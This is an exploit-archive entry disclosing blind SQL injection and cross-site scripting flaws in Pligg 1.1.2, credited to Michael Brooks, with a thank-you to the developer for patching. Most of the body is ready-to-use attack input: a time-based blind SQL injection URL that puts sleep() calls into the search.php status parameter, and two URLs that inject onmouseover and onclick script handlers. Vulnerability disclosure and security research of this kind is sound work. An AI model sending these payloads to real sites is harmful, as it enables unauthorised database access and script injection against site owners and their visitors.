[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Pligg 1.1.2 Blind SQL Injection and XSS Vulnerabilities
# Published : 2010-12-25
# Author : Michael Brooks
# Previous Title : Interact 2.4.1 SQL Injection Vulnerability
# Next Title : D-Link WBR-1310 Authentication Bypass Vulnerability
Credit: Michael Brooks
Special thanks to Eric Heikkinen for patching these quickly.
Blind SQL Injection
http://host/pligg_1.1.2/search.php?adv=1&status=
'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch=?Search
+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0
XSS:
http://host/pligg_1.1.2/?xss='onmouseover=alert(1);//
http://host/pligg_1.1.2/?search=" onclick=alert(1) a=